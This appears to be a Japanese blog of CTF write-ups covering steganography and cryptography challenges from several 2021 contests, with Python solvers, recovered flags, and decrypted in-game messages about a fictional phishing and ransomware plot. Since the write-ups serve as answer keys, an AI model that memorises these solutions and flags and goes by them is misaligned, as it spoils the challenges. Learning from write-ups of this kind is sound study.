drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:46 .
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 ..
-rw-rw-r-- 1 luciafer luciafer   49 Oct 10 02:45 flag.txt

./Music:
total 8
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 .
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 ..

./Pictures:
total 8
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 .
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 ..

./Videos:
total 8
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 .
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 ..
luciafer@abee273c2782:~$ cat ./Downloads/flag.txt
flag{Lucy-a-FUR-G0T-R3KT-by-the-BLUZers-CLUB!!!}
flag{Lucy-a-FUR-G0T-R3KT-by-the-BLUZers-CLUB!!!}

Scary Bunny (Steganography 10)

パスワードなしでsteghideを実行する。

$ steghide extract -sf bunny.jpg 
Enter passphrase: 
wrote extracted data to "steganopayload730241.txt".
$ cat steganopayload730241.txt 
flag{Carr0t}
flag{Carr0t}

Behind the Curtain (Steganography 30)

$ binwalk steg01.jpg 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
30            0x1E            TIFF image data, big-endian, offset of first image directory: 8
13266         0x33D2          JPEG image data, JFIF standard 1.01
13296         0x33F0          TIFF image data, big-endian, offset of first image directory: 8

jpgの後ろにjpgが付いているので、切り出す。この切り出したjpg画像にフラグが書いてあった。
f:id:satou-y:20211021232450j:plain

flag{L3t_m3_in}

V0icE (Steganography 50)

Audacityで開き、スペクトログラムを見ると、フラグが見えた。
f:id:satou-y:20211021232552p:plain

flag{1257}

Big Boss (Cryptography 10)

フィッシングのターゲットの名前を答える必要がある。写真にはこう書いてある。

Hvs bslh asshwbu kwzz ps hcrom oh bccb. Bssr hc twbr cih
Xwaaws'g kcfy gqvsrizs gc ks ybck kvsb wg psgh hc dvwgv
vwa. Hvs qoadowub bssrg hc zccy zwys wh qoas tfca
vwg pcgg, Aofqig Pmbsf, Vs kcfyg og ob Orjobqsr
Gczihwxbg Gidsfjwgcf - rcb'h tcfush hc wbqzirs
hvoh wb hvs saowz.

これをquipqiupにかける。

The next meeting will be today at noon. Need to find out Jimmie's work schedule so we know when is best to phish him. The campaign needs to look like it came from his boss, Marcus Byner, He works as an Advanced Solutijns Supervisor - don't forget to include that in the email.
flag{Marcus_Byner}

Poor MEGAN! (Cryptography 20)

問題タイトルから考えると、暗号はMEGAN-35。http://qbarbe.free.fr/crypto/eng_megan35d.phpで復号する。

flag{Six-Parts-Honey-One-Part-Garlic}

To Be Xor Not to Be (Cryptography 75)

暗号はXORと推測できる。フラグが"f"から始まることを前提に1バイトの鍵を求め、全体を復号する。

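# Ciphertext as given by the challenge (printable ASCII).
enc = ".$)/3<'e-)<e':e&'<e<'e-)<5"

# Known-plaintext recovery of a single-byte XOR key: the flag is assumed to
# start with "f", so the first ciphertext character XOR ord('f') is the key.
key = ord('f') ^ ord(enc[0])

# XOR every ciphertext character with the recovered key byte.
flag = ''.join(chr(ord(c) ^ key) for c in enc)
# print(...) with a single argument behaves the same on Python 2 and 3;
# the original `print flag` statement is a SyntaxError on Python 3.
print(flag)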
flag{to-eat-or-not-to-eat}

A(n) [ENCRYPTED] by Any Other Name (Cryptography 100)

使用しているブロック暗号のモードはECBモード。暗号アルゴリズムはECBモードを持っている暗号。鍵が必要だが、わからない。
https://ghosttown.deadface.io/t/hint-for-mort1cia/47にヒントらしきものが書いてあった。

暗号アルゴリズムはパスワードの同音異義語
パスワードは Spook, Spectre, Spirit, Phantasm の同義語

ここから暗号アルゴリズムはGOST、パスワードはghostと推測する。https://www.tools4noobs.com/online_tools/decrypt/で以下を指定して復号する。

鍵:ghost
Algorithm: GOST
Mode: ECB
Decode the input using: Base64

復号結果は以下の通り。

The hack on Lytton Labs is going down at 11:59 PM, October 31, 2021.  Be ready with the custom ransomware.  We will upload it to their servers and unleash it in a scripted, coordinated attack!  Make sure to have at least five other hackers assist you with this.  thezealot is coordinating this operation.

flag{the-USSR-is-the-GOST-with-the-MOST}
flag{the-USSR-is-the-GOST-with-the-MOST}

He Thrusts His Fists Against the Post (Cryptography 100)

Rail Fence Cipher。"flag{"から始まるように組んでみる。
f:id:satou-y:20211021233307p:plain

flag{and-yet-swears-he-observes-the-phantasms}

Reply Cyber Security Challenge 2021 Writeup

この大会は2021/10/9 9:00(JST)~2021/10/11 9:00(JST)に開催されました。
今回もチームで参戦。結果は900点で2247チーム中115位でした。
自分で解けた問題をWriteupとして書いておきます。

Too much sharing (CRYPTO 100)

RSA暗号と思われる。c, n, phiがわかっている。eの値は以下のようになっている。

e = int(str(p)[:32]) + int(str(q)[:32])
素数になるまで1プラスする。

phiとn、p、qの関係は以下のようになる。

phi = (p - 1) * (q - 1) = n - (p + q) + 1
p + q = n - phi + 1

p + qとp * q = nがわかるので、二次方程式 x^2 - (p + q)x + n = 0 を解けば、pとqはわかる。p, qがわかれば、eも算出できる。あとは通常通り復号すればよい。

#!/usr/bin/python3
from Crypto.Util.number import *
from sympy import *

# The last space-separated token of each of the first three lines is parsed
# as an integer; the names follow the write-up's c, n, phi in that order.
with open('crypto100-readme.txt', 'r') as f:
    Claire, Nathan, Philip = (
        int(f.readline().rstrip().split(' ')[-1]) for _ in range(3)
    )

# phi = (p - 1)(q - 1) = n - (p + q) + 1, so the sum p + q follows directly.
# Publishing phi alongside n therefore gives away the factorisation.
p_q = Nathan - Philip + 1

# p and q are the two roots of x * ((p + q) - x) = n.
p = symbols('p')
roots = solve(Eq(p * (p_q - p), Nathan))
Portia = roots[0]
Quincy = roots[1]
assert Portia * Quincy == Nathan

# Rebuild e as the challenge describes it: add the first 32 decimal digits of
# each prime, then step up to the next prime.
Edgard = int(str(Portia)[:32]) + int(str(Quincy)[:32])
while not isPrime(Edgard):
    Edgard += 1

# Standard RSA decryption with d = e^-1 mod phi.
d = inverse(Edgard, Philip)
m = pow(Claire, d, Nathan)
flag = long_to_bytes(m).decode()
print(flag)
{FLG:Cha0s_h1d3s_b3h1nd_th3_m3n4c1ng_f4c3_0f_0rd3r!}

What an Enigma! (CRYPTO 200)

エニグマ暗号で、M4 Sharkであるようだ。まず順にhelpを解き、パラメータを取得する。
first helpでは、モールス信号をデコードする。

GURCBFVGVBAFNAQEVATFLBHARRQNERS21Y18G16T11

さらにROT13をかける。

THEPOSITIONSANDRINGSYOUNEEDAREF21L18T16G11
→THE POSITIONS AND RINGS YOU NEED ARE F21 L18 T16 G11

second helpでは、表からワードを消し込む。

NH CW MK PO ZS QB FU TR

他のパラメータはブルートフォースで復号する。

from enigma.machine import EnigmaMachine
import itertools

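ciphertext = 'utogaaxgeonuvkegegddajktikdtvepnkolokj'
rotors = ['Beta', 'Gamma', 'I', 'II', 'III', 'IV', 'V', 'VI', 'VII', 'VIII']
reflectors = ['B', 'C', 'B-Thin', 'C-Thin']

# Start positions, ring settings and plugboard come from the decoded hints;
# only the rotor order and the reflector are unknown, so every combination is
# tried in the same order as nested loops would (rotor tuple outer, reflector
# inner) and the search stops at the first plaintext starting with "flg".
# NOTE(review): the hint lists rings 21 18 16 11 while (20, 17, 15, 10) is
# passed here; presumably the library takes 0-based integers. Confirm against
# the enigma package documentation.
candidates = itertools.product(itertools.product(rotors, repeat=4), reflectors)
for rotor, reflector in candidates:
    machine = EnigmaMachine.from_key_sheet(
        rotors=rotor,
        reflector=reflector,
        ring_settings=(20, 17, 15, 10),
        plugboard_settings='NH CW MK PO ZS QB FU TR')
    machine.set_display('FLTG')
    flag = machine.process_text(ciphertext.upper()).lower()
    if flag.startswith('flg'):
        # print(...) with one argument works on both Python 2 and Python 3;
        # the original `print flag` statement is Python 2 only.
        print(flag)
        break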

実行結果は以下の通り。

flgthematrixhasyoufollowthewhiterabbit
{FLG:thematrixhasyoufollowthewhiterabbit}

pbctf 2021 Writeup

この大会は2021/10/9 9:00(JST)~2021/10/11 9:00(JST)に開催されました。
今回もチームで参戦。結果は 134点で210チーム中201位でした。
自分で解けた問題をWriteupとして書いておきます。

Alkaloid Stream (Crypto)

暗号の処理概要は以下の通り。

・flag: flagを2進数表記
・key = keygen(len(flag))
・keystream, public = gen_keystream(key)
 ※len(key)=600の場合
 ・i=0, j=0, fake[0] ^= key[1]
 ・i=0, j=1, fake[0] ^= key[2]
      :
 ・i=0, j=199, fake[0] ^= key[200]
 ・i=1, j=0, fake[1] ^= key[2]
 ・i=1, j=1, fake[1] ^= key[3]
      :
 ・i=1, j=199, fake[1] ^= key[201]
      :
 ・i=398, j=0, fake[398] ^= key[399]
      :
 ・i=398, j=199, fake[398] ^= key[598]
 ・i=399, j=0, fake[399] ^= key[400]
      :
 ・i=399, j=199, fake[399] ^= key[599]
 ・i=597, j=0, fake[597] ^= key[598]
 ・i=597, j=1, fake[597] ^= key[599]
 ・i=598, j=0, fake[598] ^= key[599]

このことから以下のように算出し、fakeとkeyを求めることができる。

fake[599] = 0 -> key[599] = ペアの数値
fake[598] = key[599] -> key[598] = ペアの数値
fake[597] = key[598] ^ key[599] -> key[597] = ペアの数値
fake[596] = key[597] ^ key[598] ^ key[599] -> key[596] = ペアの数値
      :

fakeとkeyを求めたら、keystreamを算出し、暗号文とXORをとればフラグになる。

#!/usr/bin/python3
import ast
import copy

def xor(a, b):
    """Return the element-wise XOR of *a* and *b* as a list.

    Pairs are formed with zip(), so the result is as long as the shorter
    of the two inputs.
    """
    out = []
    for left, right in zip(a, b):
        out.append(left ^ right)
    return out

def recover_keystream(key, public):
    """Rebuild the keystream bits from the recovered key values.

    For every two-element entry of *public*, the bit is 0 when the first
    element is one of the values in *key* and 1 when the second element is.
    An entry with neither element in *key* trips the assertion.
    """
    known = set(key)
    keystream = []
    for pair in public:
        first, second = pair
        if first in known:
            bit = 0
        elif second in known:
            bit = 1
        else:
            assert False, "Failed to recover the keystream"
        keystream.append(bit)
    return keystream

def bytes_to_bits(inp):
    """Expand each value in *inp* into its bits, most significant first.

    Every value is formatted as a zero-padded 8-digit binary string and the
    digits are returned as a flat list of ints.
    """
    return [int(digit) for value in inp for digit in format(value, '08b')]

def bits_to_bytes(inp):
    """Pack a flat list of bits into bytes, eight bits per byte, MSB first.

    A trailing group shorter than eight bits is converted as-is, i.e. it is
    read as a shorter binary number rather than padded on the right.
    """
    groups = (inp[start:start + 8] for start in range(0, len(inp), 8))
    return bytes(int(''.join(str(bit) for bit in group), 2) for group in groups)

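with open('output.txt', 'r') as f:
    # First line: hex-encoded ciphertext.
    enc = bytes.fromhex(f.readline().rstrip())
    # Second line: the published list of pairs. The file is challenge-supplied
    # (untrusted) input, so it is parsed as a literal with ast.literal_eval
    # rather than executed with eval().
    public = ast.literal_eval(f.readline().rstrip())

ln = len(public)

key = [0] * ln
fake = [0] * ln
tmp_pub = copy.copy(public)

# Walk the indices from last to first. fake[i] is already known when index i
# is reached (the last one starts at 0), so the pair containing fake[i] is
# looked up and its other element is taken as key[i]. fake[i - 1] is then the
# XOR of key[i], key[i + 1], ... over at most ln // 3 entries.
for i in range(ln - 1, -1, -1):
    for p in tmp_pub:
        if p[0] == fake[i]:
            key[i] = p[1]
        elif p[1] == fake[i]:
            key[i] = p[0]
        else:
            continue
        if i > 0:
            # The slice stops at the end of the list, which replaces the
            # explicit `i + j >= ln` bound check.
            for k in key[i:i + ln // 3]:
                fake[i - 1] ^= k
        # Each pair is consumed once so it cannot match a later index.
        tmp_pub.remove(p)
        break

keystream = recover_keystream(key, public)

# Decrypt bit by bit: ciphertext XOR keystream.
enc = bytes_to_bits(enc)
flag = bits_to_bytes(xor(enc, keystream)).decode()
print(flag)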
pbctf{super_duper_easy_brute_forcing_actually_this_one_was_made_by_mistake}